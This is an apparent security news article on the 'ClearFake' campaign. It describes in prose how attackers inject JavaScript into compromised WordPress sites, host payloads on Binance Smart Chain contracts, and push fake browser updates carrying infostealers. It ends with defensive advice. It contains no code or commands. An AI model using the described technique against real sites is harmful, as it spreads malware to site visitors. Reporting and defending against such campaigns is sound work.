Unveiling the “Etherhiding” Technique: Uncovering Malicious Code in WordPress Sites

Rise of EtherHiding: Abusing Blockchain Technology for Malicious Activities

Campaign Overview and Technique

Researchers from Guardio have uncovered a new cyberattack campaign dubbed “ClearFake” that utilizes blockchain technology to host and spread malicious code. In this campaign, threat actors exploit compromised WordPress sites to distribute fake browser updates that contain various forms of malware, including the infostealers RedLine, Amadey, and Lumma. While blockchain is commonly associated with cryptocurrency transactions and their security, this campaign, known as “EtherHiding,” demonstrates how attackers can leverage blockchain for other nefarious activities.

EtherHiding utilizes Binance Smart Chain (BSC) contracts from Binance, one of the largest cryptocurrency sites globally, to host parts of a malicious code chain. By leveraging BSC contracts, attackers can employ a technique that Guardio describes as the “next level of Bullet-Proof Hosting.” This method allows malicious code to be hosted and served in a manner that evades detection and prevents takedowns. The immutable and publicly accessible nature of the blockchain enables attackers to execute actions automatically and host code ‘on-chain’ without an avenue for removal.

Attack Methodology

The EtherHiding cyberattack begins when threat actors inject a concealed JavaScript code into compromised WordPress sites, which retrieves a second-stage payload from an attacker-controlled server. Attackers then deface the websites, presenting users with a convincing overlay that demands a browser update before accessing the site. This method affords the attackers the capability to remotely modify the infection process and display any desired message without revisiting the WordPress sites. The dynamic nature of the attack makes it difficult to detect and halt the activity.

Blockchain Abuse and Potential Countermeasures

Beyond the specific EtherHiding exploit, the ClearFake campaign highlights the potential for blockchain abuse in various other malicious activities, such as malware propagation, data exfiltration, and eluding traditional law enforcement shutdown methods. While blockchain and other Web 3.0 technologies offer innovation, they also provide a fertile ground for threat actors to leverage their benefits for nefarious purposes.

To block the ClearFake attack, Guardio suggests that Binance could disable queries to addresses already identified as “malicious” or disable the eth_call debug method for unvalidated contracts. While it remains undisclosed whether Guardio reached out to Binance regarding these potential fixes, such proactive measures by cryptocurrency platforms could contribute to mitigating abuse of blockchain technology.

Moreover, securing WordPress sites, often vulnerable to exploitation, is crucial in preventing threats like the ClearFake campaign from causing widespread damage. Guardio recommends keeping WordPress infrastructure and plugins updated, safeguarding credentials, using robust and periodically-changed passwords, and maintaining a vigilant watch over site activity to promptly detect and mitigate any malicious instances.

Editorial: Balancing Innovation and Security

The emergence of the ClearFake campaign underscores the ongoing cat-and-mouse game between cybercriminals and security experts in the face of advancing technology. While blockchain and Web 3.0 technologies offer immense potential for innovation, they also carry inherent security risks that need addressing.

As society embraces the benefits of emerging technologies, it is essential to adopt a proactive stance on cybersecurity. Developers and organizations developing blockchain platforms must prioritize building secure frameworks that prevent malicious abuse. Additionally, collaboration between cybersecurity professionals, blockchain experts, and law enforcement agencies should be fostered to quickly identify and mitigate emerging threats.

However, striking the right balance between security and innovation is a delicate task. Solutions that impede the fundamental capabilities and advantages of blockchain may undermine its potential. Therefore, any security measures implemented should carefully consider the trade-offs between security and the overall functionality and benefits of blockchain technology.

Advice: Safeguarding Against Blockchain Abuse

As the ClearFake campaign highlights the susceptibility of WordPress sites and the potential for blockchain abuse, individuals and organizations can take several steps to fortify their defenses:

1. Regularly Update and Secure WordPress Infrastructure:

Keeping WordPress installations, themes, and plugins up to date significantly reduces the risk of exploitation. Employing robust security measures, such as two-factor authentication and website security plugins, enhances the protection of WordPress sites.

2. Strengthen Credentials and Passwords:

Adopting strong and periodically-changed passwords for all WordPress accounts and other associated services is crucial. Implementing a password management system and enabling multi-factor authentication can further fortify account security.

3. Monitor Website Activity:

Closely monitoring site activity and employing website monitoring tools can help detect any signs of malicious activity promptly. Constant vigilance and proactive response to any suspicious activities can mitigate potential threats.

4. Engage in Continuous Education and Awareness:

Keeping abreast of the latest trends, risks, and countermeasures in the cybersecurity landscape is essential. Education and awareness enable individuals and organizations to make well-informed decisions regarding security practices, including those related to blockchain technology.

5. Encourage Collaboration:

Promoting collaboration between cybersecurity professionals, blockchain experts, and relevant stakeholders can foster collective efforts to combat emerging threats and develop effective mitigation strategies.